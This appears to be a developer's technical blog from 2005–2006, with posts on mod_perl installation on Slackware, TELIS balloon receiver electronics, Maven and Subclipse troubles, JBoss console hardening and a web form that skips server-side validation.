Except it's editable. This can be done with any programmable web client, such as the libwww-perl module. Luckily, Firefox has the webdeveloper extension, which can turn select fields into text fields.

create rule novell webaccess2.png

Novell's Webmail application luckily doesn't validate these fields. So all of a sudden, we have an extra feature where we can sort out e-mails according to the contents of the CC: field.

create rule novell webaccess3.png

Useful when you're on a dating site and you're not looking for the (boring) choices of Male or Female, but -- say -- Muppet.

On a serious note, your framework for web development should provide automatic checks for this. For instance, PHP's PEAR classes contain the HTML_QuickForm class which programmatically can build HTML forms and (amongst hundreds of other features) nicely checks whether the entered values don't deviate from the possible selections.

2006-10-23 Keeping an eye on logs

When developing, you often want to keep an eye on several logs at a time. gnome-terminal is ideal for this, with its multiple tabs. To fire up one terminal with several named tabs at once, adapt the following shellscript and save it to a file called 'logwatch' or something.

  #!/bin/sh
  gnome-terminal \
  --window --title "Apache log" \
  -e "ssh sron0311 tail -f /var/log/apache/error_log" \
  --tab -title="messages" \
  -e "ssh sron0311 tail -f /var/log/messages" \
  --tab -title="Apache mod_perl log" \
  -e "ssh sron0311 tail -f /home/apache_mod_perl/apache/logs/error_log"

Basically, each tab consists of a line where the title is set and a line where the command is set to view the logfile. Of course, the first tab to be opened is a complete window, not a tab.

Instead of --window or --tab, it's possible to use the --window-with-profile=... or --tab-with-profile=... option to set a particular profile for logging. You could give these windows/tabs a special background color to set them apart from the other terminals.

gnome-term-logging.png

2006-10-20 Measuring FFO offsets

The electronics man of the Telis project came up with a script to measure any offsets in the DAC and ADC that sets input and reads measurements on the FFO (Flux Flow Oscillator).

The ADC that's used has many possibilities. It has four channels and for each of those, has a register to which an offset can be written.

measuring ffo offsets.jpg

The script measures the offsets in four steps (noted in red on the schema):

  1. The FFO bias channel is set to an internal dummy resistance. ADC channel III (ch III on the schema) should not measure any current (i.e. be 0). It probably reads somewhat above or below zero, so the scripts note the first offset and writes it to the offset register in the ADC so future measurements take this into account.
  2. The first DAC (the upper one in the picture) is set to 0 mV. This time, ADC channel I shouldn't measure any current. Again, there's probably an offset but the script only notes this internally; this DAC doesn't have registers to save an offset.
  3. For the second (lower) DAC we don't have any way of measuring an offset. However, for ADC channel II the precision is not as important as ADC channels I and III. We simply assume that the offset is the same as the first DAC.
  4. When the second DAC its offset is assumed, we measure the offset on ADC channel II and set it to the appropriate register on the ADC.

Note that the ADC has possibilities to measure the offsets itself, but in this case that can't be used: there are amplifiers just outside of the ADC that are not drawn in the schema above. These can have an offset as well and this is taken into account by the above-mentioned scripts.

2006-10-17 Gigabit network cards

At work, Tiemen Schut tested the performance under Linux for two Gigabit network cards, a D-Link DGE-550SX (optical) and an Intel Pro/1000 GT (standard Cat5e).

While the throughput is the same, the CPU usage is a major difference. Both Linux drivers allow setting some parameters for generating as little interrupts as possible. The difference:

CPU usageNumber of interrupts
Intel Pro/1000 GT30%5.000
D-Link DGE-550SX80%23.000

To recreate the test:

  • Start ksysguard
  • Create a new tab
  • In the left pane, click open Localhost > CPU Load > Interrupts
  • Drag the 'Total' to the new tab
  • Start a heavy network session, perhaps FTP'ing a large file

2006-10-05 Character set encoding

Today, I received an e-mail from Amazon:

  From: "Amazon.co.uk" <auto-shipping@amazon.co.uk>
  Subject: Your Amazon.co.uk order has dispatched
  Content-Type: text/plain; charset=ASCII
  MIME-Version: 1.0
  
  Greetings from Amazon.co.uk,
  
  We thought you would like to know that the following item has been sent 
  to:
  
  <<< cut out some uninteresting parts >>>
  
  Ordered  Title                          Price  Dispatched  Subtotal  
  ---------------------------------------------------------------------
  Amazon.co.uk items (Sold by Amazon.com Int'l Sales, Inc.):
  
     1     Salsa [Box set]                  £8.09      1    £8.09

My Mozilla mail program was showing the pound sign as follows:

char encoding amazon.png

Now why does it show the pound sign as a funny question mark? It's because the e-mail header says it should do so (emphasis mine):

Content-Type: text/plain; charset=ASCII

That's right, ASCII. Which is a seven-bit character encoding, which does not include the pound sign. Solution? Go to menu View -> Character Encoding -> Western (Windows-1252) (or ISO 8859-1). And the pound sign is shown.

Another fine example of a programmer who didn't understand what a character encoding was and basically just tried to ignore the whole issue and stick with ASCII. It's even spelled the wrong way (the standard prefers US-ASCII).

Q&A probably didn't caught this because they test on a Windows machine with Outlook or Outlook Express, completely forgetting about Apple's, Linux boxes, and Windows machines which don't have the character set by default set to Windows-1252 but to some other language like Russian.

This whole post sounds a bit pedantic however I find it strange that in the 21st century, someone can afford to stick his head in the sand and pretend that the whole world still uses ASCII.

2006-10-04 Mod perl and Slackware part 2

The previous day, I thought I had Apache with mod_perl working on Slackware 10.2, but alas, funny segfaults all over the place. This time, I installed mod_perl in a completely separate user account and it works.

As root, create a user:

        # useradd -g users -m -s /bin/bash apache_mod_perl
        # passwd apache_mod_perl

Login as the new user, then:

        $ mkdir bin lib perl_modules
        $ wget http://search.cpan.org/CPAN/authors/id/L/LD/LDS/CGI.pm-3.25.tar.gz
        $ tar xfz CGI.pm-3.25.tar.gz
        $ cd CGI.pm-3.25/
        $ perl Makefile.PL PREFIX=$HOME
        $ make && make install

Add the following line to .bash_profile:

        export PERLLIB=$PERLLIB:$HOME/lib/perl5/5.8.6:\
        $HOME/lib/perl5/site_perl/5.8.6"

And logout/login.

        $ mkdir -p $HOME/.cpan/CPAN
        $ cp /usr/lib/perl5/5.8.6/CPAN/Config.pm .cpan/CPAN/
        $ vi .cpan/CPAN/Config.pm

Edit the file and change all paths with 'home' in them to the home directory of the current user (apache_mod_perl). Also change line:

        'makepl_arg' => q[],

to:

        'makepl_arg' => q[PREFIX=/home/apache_mod_perl],

Save and exit, and install any additional Perl modules your application needs. In our case, we typed:

        perl -MCPAN -e shell
        cpan> install  XML::Simple IPC::Cache
        Exit the cpan shell.
        $ mkdir ~/src
        $ cd ~/src
        $ wget http://ftp.bit.nl/mirror/slackware/slackware-10.2/source/n/apache/apache_1.3.33.tar.gz
        $ wget http://perl.apache.org/dist/mod_perl-1.0-current.tar.gz
        $ tar xfz apache*
        $ tar xfz mod*
        $ cd mod*
        $ perl Makefile.PL PREFIX=$HOME APACHE_PREFIX=$HOME/apache \
          APACHE_SRC=../apache_1.3.33/src DO_HTTPD=1 USE_APACI=1 EVERYTHING=1
        $ make && make install && cd ../apache_1.3.33/ && make install

Now edit /home/apache_mod_perl/apache/conf/httpd.conf and:

  • (if you're resource-bound) change StartServers to 2, MinSpareServers to 1, MaxSpareServers to 3
  • Change User to apache_mod_perl and change Group to users

Save, exit and edit ~/.bash_profile. Add the following line:

        export PATH=$HOME/apache/bin:$PATH

Logout and login. Type:

        $ apachectl start
        $ cat apache/logs/error_log

It should say something like:

        "Apache/1.3.33 (Unix) mod_perl/1.29 configured"

You want users to be able to execute Perl scripts. Edit ~/apache/conf/httpd.conf and add the following lines at the end (only do this if you know each and every option below and understand the security risks):

  # Line below checks all modules for changes, only necessary for development
  PerlModule Apache::StatINC
  <Directory /home/*/public_html>
    Options MultiViews Indexes FollowSymlinks ExecCGI
    <Files *pl>
      SetHandler perl-script
      PerlHandler Apache::Registry
      Options ExecCGI FollowSymLinks
      allow from all
      PerlSendHeader On
      # Line below checks all modules for changes, only necessary for development
      PerlInitHandler Apache::StatINC
    </Files>
  </Directory>

To set the directory for modules:

  <Directory /home/someuser/public_html>
    PerlSetEnv "PERL5LIB" "/home/someuser/src/project/perl/lib"
  </Directory>

Restart apache with:

  $ apachectl restart

Go to http://localhost:8080/someuser/thescript.pl and be astounded.

2006-10-03 Mod perl and Slackware

Note: these steps are obsolete. In the comments, McDutchy points out a much easier way. This is much less work and also doesn't require any packages to be reinstalled.

Slackware 10.2 doesn't include mod_perl. To install this package while staying as close to the original Slackware installation, we're going to compile mod_perl using the patched Apache that's particular to Slackware.

First we download Slackware's Apache source and mod_perl. Download all the Slackware files from your favorite mirror. Also download mod_perl and put it in the same directory.

Edit the Slackware build script apache.SlackBuild. Add the following line after line 26:

 tar xvzf $CWD/mod_perl-1.0-current.tar.gz

Before the comment line that says "# build apache", insert the following lines:

  # build mod_perl
  cd $TMP/mod_perl-1.29
  perl Makefile.PL \
    APACHE_SRC=../apache_1.3.33/src \
    NO_HTTPD=1 \
    USE_APACI=1 \
    PREP_HTTPD=1 \
    EVERYTHING=1 \
  make
  make install

Finally add the following line after the ./configure options of Apache:

  --activate-module=src/modules/perl/libperl.a \

As root, execute the Slackware build script. When it's done, install the resulting package:

  # sh ./apache.SlackBuild
  # installpkg /tmp/apache-1.3.33-i486-1.tgz

If any question comes up, accept the default. After installation, you may also need to add the following lines to the file /etc/apache/httpd.conf:

  LoadModule perl_module        libexec/apache/libperl.so
  AddModule mod_perl.c

2006-09-19 PLL IF curves

The electronics man of the Telis project has created a new macro (set of instructions in the flash memory of the Telis FPGA). The macro repeatedly steps up the harmonic mixer bias voltage and then varies (sweeps) the power of the LSU, the Local Source Unit.

I'm busy making a 3D plot of the result of this macro. It should look like this:

 LSU power (dBm)
   |
   |
   |
 15|---------------
   |
 10|---------------
   |
  5|---------------
   |_____________________
   0                 Harmonic Mixer Bias Voltage

The lines at 5, 10 and 15 dB must be colorized to indicate the PLL IF level. This is an output of the PLL, a voltage to indicate

2006-09-14

Working in the lab in Groningen until 21:15 yesterday, my colleague got his macro working (a 3Mb movie):

pll optimization.avi

These macros are quite interesting: they're stored in on-board flash and run on the FPGA. This FPGA has grown and grown in functionality until it could run lists of instructions which can be nested and have loops in them.

2006-07-03 PLL locking

If you've seen the previously posted video, you might wonder what happened. What was shown, was a spectrometer displaying a 100 MHz wide spectrum of the output of the PLL. The Y-axis displays the intensity. The center was set to 400 MHz. The arc is noise, and you can see a spike travel from right to left, see below:

pll locking1.png

The travelling is caused by changing the FFO (flux flow oscillator) control line. When we find the FFO control line setting where the power of the PLL signal is at the maximum, we remember that setting.

As I explained in 2006-04-25 SIR acronym, the FFO is a voltage-controlled oscillator. If you keep the complete schema in your mind (hm ffo pll schema.png), then you'll see that the signal that the FFO sends, is mixed by the harmonic mixer (HM) and ends up in the PLL again.

Below, a little schematic is shown which basically highlights the upper part of the complete schema hm ffo pll schema.png. The LSU (Local Source Unit) sends a signal of about 20 GHz into the harmonic mixer and it's possible to regulate with which power this is done. This influences the harmonic frequencies at the right. The length of the spikes says something about the power; altering the LSU power influences the length of particular spikes.

pll locking2.png

Another knob which we can fiddle with, is the bias of the HM. The bias is important, because this controls the way how the HM mixes the signals from the LSU and FFO. If you'd draw an I/V curve of the HM, it would be something like this:

ffo iv curve.png

You don't want to set the bias voltage so high that the line is linear, because then it would act as a resistor and resistors don't mix signals. Instead, the bend in the lower-right is the best setting (at around 2.5 mV).

The schematic below highlights the lowerleft part of the schema hm ffo pll schema.png. We get the phase difference as a voltage which the electronics can read out. We need this because we want it to be 0 volts before we turn the PLL gain higher.

pll locking3.png

2006-06-29

For your viewing pleasure, a camera was aimed at a spectrum analyzer. It shows a macro that's being run which does finetuning of the FFO and then locking with the PLL. It's about 3.5 Mb.

telis pll locking macro.avi

Quote of the day:
Ed: "In theory, nothing works and we know why. In practice, it works and we don't know why."
Pavel: "Yeah and we're working in between: in practice, it doesn't work and we don't know why."

2006-06-19 Making FFO plots

We want to make an I/V curve of the flux flow oscillator (FFO), including a third dimension to express the power with which the FFO is beaming. See below for an example plot.

2006-05-30 PLL optimization

The electronics man of the Telis project wrote a couple of routines so the PLL can be finetuned automatically. This means finding the maximum in a curve. Below is a hardcopy of the scope readout:

PLL-optimizer-testresults.JPG

2006-04-27 Perl modules and CGI

Suppose you have a bunch of Perl scripts and modules. Those modules have differing versions and you don't want to hardcode the path in the scripts. And a few of the scripts also run through CGI.

The solution is to set the PERLLIB environment variable for the scripts that are run on the commandline. Point the variable to the directory where you install the particular version of the modules. You could add the following lines in $HOME/.bash_profile:

  # separate multiple directories with a colon.
  export PERLLIB="$HOME/lib/mymodules-rev316"

This can be done for different users on one Unix machine, i.e. if you're testing under user "test-rev316", you'll use the above line. If you're a developer, set it to the directory containing the checked-out source.

For the CGI scripts, the same can be done. Put a line like this in Apache's httpd.conf file:

  # separate multiple directories with a colon.
  SetEnv PERLLIB "/home/bartvk/lib/mymodules-rev316"

This variable can be placed between <Directory> tags, so again different users on one Unix machine can have different values:

  <Directory /home/test-rev316/public_html/cgi-bin>
    SetEnv PERLLIB "/home/test-rev316/lib/mymodules-rev316"
    Options ExecCGI
    SetHandler cgi-script
  </Directory>
  <Directory /home/bartvk/public_html/projectWorldDomination/cgi-bin>
    SetEnv PERLLIB "/home/bartvk/src/projWorldDom/client/perl/lib"
    Options ExecCGI
    SetHandler cgi-script
  </Directory>

You could even do fancy things with the SetEnvIf directive, where you set PERLLIB according to the URL that comes in. Generally, the above will be OK though.

Don't fall into the trap of delaying the hassle! Sooner or later, another developer will take over the project and will want to leave the current code as is, and continue in another account. If all scripts and modules assume a particular directory layout, this will mean a fair bit of coding and testing before the new developer is up-to-speed.

2006-04-25 SIR acronym

In the previous entry, I told that the acronym SIR stands for Superconducting Integrated Receiver. What I didn't explain, is what it actually means.

First the superconducting part: when you want to measure a very weak signal, at some point the electronic noise will interfere with your measurement. This noise is caused by small variations in temperature. The lower the temperature, the lower the electronic noise. Hence very sensitive instruments need to be supercooled.

Now the receiver part: the signal which is measured is between 500 to 750 GHz. This frequency sits between radio signals and light. You can use optics as well as antennas. The SIR chip uses a very tiny double dipole antenna which is etched onto the chip. A silicium lens is used along with mirrors to guide the signal onto the chip its antenna. Note that although the signal can be put on the wire, it will fade out very quickly. That's why right below the antenna, the SIR mixer is located.

Finally, the "integrated" part of the acronym. This chip contains a SIS mixer as well as beforementioned antenna. However, two signals are mixed, the one from the antenna and another one from the FFO, the flux flow oscillator. This is a voltage-controlled oscillator.

This FFO is also integrated on the SIR chip, and generates a set signal between 500 and 650 GHz, the frequency we want to measure on. The fourth and final part on the SIR is the Harmonic Mixer (HM), which receives the FFO-generated signal and mixes it along with a 20 GHz signal to get a signal which looks like the one black one below:

hm frequency.png

On 2006-02-23 Pictures from TELIS Project, I showed the boards, of which the most right one is the LSU board. This board generates a number of signals. It contains an ultra-stable 10 MHz oscillator which uses a crystal, sitting in a nice warm little oven to keep it happy.

One LSU signal has a frequency 20 to 22 GHz with a certain power, which is fed into the Harmonic Mixer. This is called the pumping of the mixer. It is mixed together with the FFO signal by the HM to get what you see above: a signal with a frequency of, say, 650 GHz together with one that's 4 GHz above it -- that's the red signal in the picture above.

The resulting signal from the HM is sent into the SIS mixer as the F1 signal shown in the sketch of the previous entry 2006-04-24 SIRs for dummies. It's called a harmonic mixer because whatever signal f you put in, out comes a signal 2f, 3f, 4f, et cetera. The LSU input signal is chosen to get the required frequency of around 650 GHz or whatever the spectrum is that we want to view. We use the 30th harmonic for this, so the LSU signal would be set to around 21.8 GHz.

Below is a bigger schematic picture of what's happening.

hm ffo pll schema.png

The upper part of the schema I've explained. On to the middle left. The FFO is happily radiating away and the frequency drifts. To keep the FFO from drifting, you want to lock it. An external (meaning outside of the cryogenic flask) piece of electronics creates a phase-locked loop (PLL). This keeps the FFO on its set frequency. It operates using a 400 MHz reference frequency generated by the LSU board, as well as the output of the HM, which is run through a mixer first. This frequency is in the MHz range for practical reasons.

Note that the FFO is extremely sensitive. You put a bias voltage on it and for every millivolt, it changes by 484 GHz. Since we want to work with steps of 0.5 MHz, this would mean that we would have to change in nanovolts.

Like the SIR, the Telis PLL is a Russian product. It has an analog output with which you can check the quality of the phase locking.

telis pll.png

If you take a step back, you can see that the LSU, Harmonic Mixer, FFO and PLL work together to get a steady signal of, say, 656 GHz. It also is possible to control this signal in steps of 0.5 MHz. This is then used to feed into and read out the SIS mixer.

2006-04-24 SIRs for dummies

Previously, I showed some pictures on the electronics that are controlled by the software I maintain and enhance. Now I'll explain what exactly is controlled.

We're basically commandeering a SIR, which stands for Superconducting Integrated Receiver. It's a tiny (4 by 4 mm) chip with which signals are measured in the 500 to 650 GHz range. The chip is set behind a silicon lens, is put in a container which is supercooled to about 2 to 4 kelvin.

Below is a picture of the SIR chip, a Russian product from the Institute of Radio-engineering and Electronics of RAS:

SIR chip.jpg

Legend: between the zero and one, the flux flow oscillator (FFO) is located. The Harmonic Mixer is located below that. More about these in a later entry. Right in the middle, a SIS mixer is etched (superconductor-insulator-superconductor). If you look at the SIS mixer from the side, you could sketch it (very badly) as follows:

sis.png

The F2 signal comes in from the atmosphere, which is a very weak signal. The F1 signal comes from the FFO, which generates a very steady known signal. Out comes a signal which basically is F1 minus F2 and which can be amplified enough to read out. When a signal hits the SIS mixer, the resistance changes slightly and you can read this out using the current.

The base as well as the edges left and right are conducting. When the chip is supercooled, they become superconducting. The edges are separated from the base by an insulation (hence the name SIS). A constant voltage bias is put on the edges (denoted in the sketch by Bias) and the current I is varying to keep the voltage constant. Below this construction, another conducting line is etched, the Control Line (denoted by CL), about which I'll tell more below.

We can draw a curve with the values of current C and V, which is called an I/V curve:

SIR IV curve 2.png

If you want to get a clear signal, your curve should be like the thick red line. (Note that the derivative of the curve is the resistance of the SIS mixer.) However, that is not the case: we get the grey line. It wiggles a bit, even goes down a bit before it rises and with a bend continues in a linear fashion. To get the thick curve, we need the control line on the SIR chip.

More about the control line. This line is conducting and etched below the SIS mixer. It must generate a magnetic field, drawn as the small circle around the control line and extending over the base. To generate a magnetic field, the current must be kept constant.

Besides the control line, the FFO is operated (more about that later). The FFO generates a clean signal with a certain power, which lifts the grey line up.

When combined we get the red line, but it still can go a bit down like the grey line. We need to find a couple of values to get a clear signal: the current and the bias voltage on the SIS, and the current on the control line. So what do we do: we set a certain current on the control line, then for that current, vary the bias voltage on the SIS from, say 1 to 10 mV.

SIR bias cl values.png

In the meantime, we read out the current on the SIS. We can then draw the I/V curves as shown above and see whether we get a nice straight curve.

Note: to keep the voltage constant on the SIS mixer, we need some kind of circuit:

sir schakelingen.png

The left circuit is a voltage source. If the current changes due to radiation hitting the SIS mixer, this circuit measures the change and with some filtering adjusts for this so the voltage stays equal. The right circuit is an alternative, an adjustment of the left circuit so it delivers a constant current instad of a voltage.

What is eventually done with the resulting signal? Well, when the signal comes in from the atmosphere, you want to analyze the spectrum (Spectroscopy) and see what kind of gases are there.

2006-03-08

Check, as most test frameworks, has the following hierarchy:

  main()
  |-- Suite1
  |   |--TestCase1
  |   |  |--TestA
  |   |  |--TestB
  |   |  |--TestC
  |   |  |--TestD
  |   |  `--TestE
  |   `--TestCase2
  |      |--TestF
  |      `--TestG
  `-- Suite2
      `--TestCase1
         |--TestA
         |--TestB
         |--TestC
         |--TestD
         |--TestE
         |--TestF
         `--TestG

It's notable that the author choose to have a lot of Suites named after whatever it's testing (say, logging), with each having one TestCase named "Core". Sometimes there's a second or a third TestCase. Each testcase has multiple tests, mostly a dozen or so.

The author has a src and a tests directory. In the tests directory, there is one main file called check_check_main.c which contains one main() function. This function adds all suites and runs them. It knows about the suites because there is a header file called check_check.h contains all the test suites. Then there is a separate file for each suite, for example, check_check_msg.c contains one test suite and a dozen tests. It has the header file check_check.h and all necessary header files to test project code.

Notable differences with JUnit are:

  • You code the test runner, while in JUnit you just define tests and run them with either an IDE plugin or on the commandline with your build tool.
  • Files do not have a separate setup() and teardown(). It remains to be seen whether this isn't necessary.
  • Since you code the runner yourself, a plugin for an IDE like Eclipse could be somewhat problematic. Users could code their tests but you'd have to parse for the name of the test suite and compile a testrunner yourself. That last step is where things could go wrong, but I might be negative.

2006-03-01

I've started using Check, a unittesting framework for plain old C. The documentation isn't lacking but here's an example test file and the corresponding Check unittest Makefile anyway.

Check can also output XML, which is useful for reporting on nightly builds. I've created an XSLT to convert to HTML: check unittest.xslt. It's very basic -- adjust to your needs. You can generate such a report on the commandline with a quick

  $ xsltproc check_unittest.xslt check_output.xml > report.html 

2006-02-23 Pictures from TELIS Project

Some pictures from work, all related to the TELIS project.


ffo sis ssb lsu 1.jpg

These are most of the boards that will be aboard the Telis balloon. From left to right:

  • FFO/PLL board, which measure and command the flux flow oscillator and phase-locked loop, which I explain in [2006-04-25_SIR_acronym|this entry]
  • SIS board, board which is connected to the electronics "in the cold" (i.e. the supercooled container) for operating the SIR, the superconducting integrated receiver
  • SSB, board which contains FPGA and talks through serial port to PC hardware
  • LSU -- Local Source Unit, board containing other necessary functions, like several temperature sensors, heaters and the generation of a 20 GHz signal (more on this some other time)

The power supplies on the backgrond are set to about 6 volts and are connected to the backplane at the far left (hard to see). This backplane provides besides power also communications.

The whole package, including batteries (see image below), will be enclosed in a casing, which will be put aboard the gondola.


batteries and charger 1.jpg

The boards need to be powered on the balloon and this is why a battery pack will be connected to the backplane in the space in the middle (see first picture). SRON built a custom charger for the also custom made battery pack.

2006-02-13

Note: I've expanded this entry in article Configuration.

In a non-trivial project, several programming languages will often be used. Keeping a common configuration file can become something of a nuisance. While it's easy enough to decide on one format, things like variables aren't easily used. For instance, you want to be able to have stuff like this:

  user=testuser_1
  bindir=/home/$USER/bin

Which will work fine for a file that you include in a Makefile. But for a PHP script, this is a pain. This is where m4 comes into play.

Just create a file called Config.m4 and put all your variables there in the following format:

  define(_USER_,testuser_1)dnl
  define(_GROUP_,testgroup)dnl

Then create a basic configuration in a file called Config.template as follows:

  user=_USER_
  group=_GROUP_
  bindir=/home/_USER_/bin

As part of your Makefile or Ant's build.xml, run m4 as follows:

  m4 Config.m4 Config.template > Config.h

Voilà, problems solved!

2006-02-01

I've been working with Subversion, especially from within Eclipse using the Subclipse plugin. I had earlier experience with the CVS plugin that comes with Eclipse. This is with Eclipse 3.1.1, Subclipse 3.0.1 and Subversion server version "SVN/1.1.4".

Some bad differences:

  • Slow. While CVS isn't the fastest animal, I found some actions in Subversion even slower. And sometimes Subclipse just leaves you waiting up to tens of seconds when for example a conflict is detected. UPDATE: after posting on the excellent Subclipse mailing list, the problem was acknowledged. A few days later, a release was available through the Eclipse update screens which fixed this bug.
  • When entering the Team Synchronize perspective, it happened once that although the "Incoming/Outgoing mode" was selected, only the incoming files were displayed. Switching to "Incoming Mode" and back again showed everything. Hmm -- smelly!
  • Minor issue: when you have made a few changes and decide against it, you can right-click on the source and choose Replace With -> Latest from repository. Subclipse performs this, but Eclipse then asks something like "File changed on filesystem. Do you want to load the changed file into the editor?" Apparently, the integration isn't yet up-to-par.

Some differences I'm neutral about:

  • In the Synchronization perspective, sometimes you review changes in a file and decide they should be left out. Funny thing is, you can't right-click and select 'override and update'. It's greyed out for whatever reason.
  • When the repository contains a newer version, you often synchronize the file and choose 'override and commit' with the CVS plugin. With Subclipse, you synchronize, choose 'Mark as merged' and then commit.
  • Whenever an error occurs (for example, you tried to commit a file which had conflicts), a little exclamation mark is displayed at the left side of the filename. You always need to right-click and choose 'Mark resolved' before you can continue.
  • Directories are versioned as well. In the Synchronization perspective, you can't update a whole directory. Well, you can, but it doesn't disappear from the file list. You'll have to select the files as well as the directory.
  • I was used to the CVS plugin. When I wanted to start working on a project that was kept in CVS, I used to do menu File -> New -> Project, then choose CVS > Checkout project from CVS. The Subclipse plugin doesn't put itself in the New Projects wizard. Instead, go to the SVN Repository Exploring perspective, seek out your project its directory, right-click on it and choose Check out. You'll then get the option Check out as a project using the New Project wizard.

Good things:

  • You can just press 'Cancel' in whatever action -- Subclipse rolls back since Subversion uses transactions. With Eclipse's CVS plugin, this isn't possible (and with good reason or so I've heard).
  • About Subversion in general: when you check in, you basically create a new revision. It's the collection of files that has a version, not each individual file. The complete commit has one commit comment -- not each file.
  • About Subversion in general: symbolic links, permissions, everything's nicely stored.

Tips

  • Subversion can handle symlinks allright. However, Eclipse isn't so good with it and thus Subclipse has a few funny things as well. For instance: use Subclipse to do a checkout on a project that contains a broken symlink to a directory outside the project. On the commandline, do svn status. No differences. In Eclipse, do menu Team -> Synchronize. A difference shows up, namely the (broken) symlink. Weird... I've taken this up with the developers and might write about it later.
  • If you're a CVS user, read Appendix A of the SVN manual for CVS converts

Conclusion

All in all, I have the feeling there are a few minor bugs (or not-so-fantastic features) to be ironed out in Subclipse. However, if you're fed up with CVS then starting small with one project is worth it.

Nice link:

2005-12-14

Awwww, Maven, you kill me, you really do!!

You maintain your Maven project its documentation in a simple XML dialect called xdocs. It's then transformed to HTML and copied to the project its website. A colleague updated documentation and then did a "maven multiproject:site site:deploy". He saw that the generated HTML documentation wasn't updated. Except it was. Look at the following source:

  <?xml version="1.0" encoding="utf-8"?>
  <document>
  <properties>
  	<title>Release notes</title>
  </properties>
  <body>
  <subsection name="SuperProject-2.5.2-build04.ear">
  ....
  </subsection>
  <section name="Releases SuperProject">
  <subsection name="SuperProject-2.5.1-build01.ear">
  ...
  ...

Notice the error? The <section> tag is placed below the <subsection> tag. Why in hell this validates is unclear to me. Is it validated in the first place? TELL ME IT IS!! Another manhour or two wasted.

2005-12-08

After firewalls are in place, you're not done securing JBoss 3.2.6. At the least, passwords should be set on the jmx-console and web-console applications.

Go to $JBOSSHOME/server/yourconfig/deploy and take the following steps to secure the jmx-console application:

  1. Edit jmx-console.war/WEB-INF/web.xml, search for the line with "security-constraint" and uncomment the block
  2. Edit jmx-console.war/WEB-INF/jboss-web.xml and uncomment the line with "security-domain"
  3. Edit jmx-console.war/WEB-INF/classes/jmx-console-users.properties and replace the second "admin" by your favorite password

Now do the same for the web-console application:

  1. Edit management/web-console.war/WEB-INF/web.xml,
    search for the line with "security-constraint" and uncomment the block
  2. Edit management/web-console.war/WEB-INF/jboss-web.xml
    and uncomment the line with "security-domain"
  3. Edit management/web-console.war/WEB-INF/classes/web-console-users.properties and replace the second "admin" by your favorite password

Besides the above steps, you'll probably want to remove the status application, the HTTP invokers, maybe JMS, etc. An excellent book is O'Reilly's JBoss, A Developer's Notebook. Chapter 9 is freely available online, which walks you through the above steps and much more.

(Re)start JBoss and go get your brownie points from the system administrators!

2005-11-28

Every now and then you'll make a mistake while updating firewall rules and lock yourself out. There's a nice trick to avoid this, if you're disciplined to take the following steps:

  1. Copy the existing firewall rules to a new file
  2. Schedule an update to the firewall rules with the existing firewall rules within 30 minutes
  3. Edit the firewall rules in the new file
  4. Load the new firewall rules and test them
  5. Remove the scheduled update and copy the new file to the old file

If the new firewall rules lock you out in step 4, you won't be able to remove the scheduled update and the old rules will be loaded in 30 minutes or so!

Thanks to an experienced sysadmin for this tip...

2005-11-25

ibiblio.org was offline today. This meant my build didn't work. Of course, no error was given, which we've come to expect from Maven ;)

All it said was:

 $ maven jar:install
  __  __
 |  \/  |__ _Apache__ ___
 | |\/| / _` \ V / -_) ' \  ~ intelligent projects ~
 |_|  |_\__,_|\_/\___|_||_|  v. 1.0.2
 
 Attempting to download one-of-our-libraries.jar.

Then it just kept waiting and waiting.

So after one of the developer wasted an hour or so finding out what the hell goes wrong, he walked to one of the sysops. This clever sysop got the luminous idea to ping ibiblio.org. Offline... After that, it was a quick fix to temporarily remove ibilio from the remote repository line in the project.properties.

This goes to show how important it is to display understandable errors for the user. Come to think of it, this goes to show how you should try to catch errors and see if there's a way to continue.

And why the flying freak is this thing looking on ibiblio for our proprietary libraries?

2005-11-23

Today, I'd like to talk to you about Maven and rights. Maven must be able to deploy to a central place, the remote repository. We'll do this using sftp. Now look at the following output:

 jar:deploy:
     [echo] maven.repo.list is set - using artifact deploy mode
 Will deploy to 1 repository(ies): R1
 Deploying to repository: R1
 Using private key: /home/user1/.ssh/keytest
 Deploying:  /home/user1/blah/myproject/project.xml-->myproject/poms/myproject-3.6.1-build01.pom
 Failed to deploy to: R1 Reason: Error occured while deploying to remote host:repository.company.com:null
 
 BUILD FAILED

The problem turned out to be a rights issue: the file already existed, but wasn't writeable:

 $ cd /var/www/repository/maven/ZIG/poms
 $ ls -l myproject-3.6.1-build01.pom
 -rw-r--r--  1 user2 users 3870 Nov 23 16:42 myproject-3.6.1-build01.pom

Don't you just love this stuff? Only took about two hours. For three teammembers.

2005-11-04

Maven, oh, Maven. Funny how much bugs this package brings up. And I don't mean its own bugs!

In the previous post, I discussed "deploying", which is Maven speak for building a jar/war/ear of your project and then copy it to a server where other dependant projects can get it.

This works. However, I documented this procedure using scp. Today I had to configure a project which used the exact same properties, but uses sftp. Of course, Maven flunks out with a NullPointerException (wouldn't you?).

  java.security.NoSuchAlgorithmException: DH KeyPairGenerator not available
  java.lang.NullPointerException
        at com.jcraft.jsch.jce.DH.getE(Unknown Source)
        at com.jcraft.jsch.jce.DHG1.init(Unknown Source)
        at com.jcraft.jsch.Session.receive_kexinit(Unknown Source)
        at com.jcraft.jsch.Session.connect(Unknown Source)

I checked out that same project locally and Maven did work fine here. But not on the shared development box. Difference? Locally, J2SDK 1.4.2 build 08 was installed and on the development box, version 1.4.2 build 03 was installed. There was a difference of a few files and besides font.properties stuff, they were related to security:

  $ diff list_j2sdk142_03 list_j2sdk142_08
  < ./jre/lib/old_security
  < ./jre/lib/old_security/cacerts
  < ./jre/lib/old_security/java.policy
  < ./jre/lib/old_security/java.security
  < ./jre/lib/old_security/local_policy.jar
  < ./jre/lib/old_security/US_export_policy.jar
  < ./jre/lib/security/jce1_2_2.jar
  < ./jre/lib/security/sunjce_provider.jar
  > ./jre/lib/security/cacerts
  > ./jre/lib/security/java.policy
  > ./jre/lib/security/java.security

Hmm.. Weird. After installing the new J2SDK build on the development box, the stacktrace didn't appear, but Maven quitted with an error nevertheless:

  Will deploy to 1 repository(ies): R1
  Deploying to repository: R1
  Using private key: /home/the_user/.ssh/id_rsa
  Deploying:
  /home/the_user/tmp/OUR_PROJECT/OUR_SUBPROJECT/project.xml-->OUR_PROJECT/poms/OUR_SUBPROJECT-0.2.0-build4-SNAPSHOT.pom Failed to deploy to: R1 Reason: Error occured while deploying to remote host:repository.the.company:null
  BUILD FAILED
  File...... /home/the_user/.maven/cache/maven-multiproject-plugin-1.3.1/plugin.jelly
  Element... maven:reactor
  Line...... 217
  Column.... 9
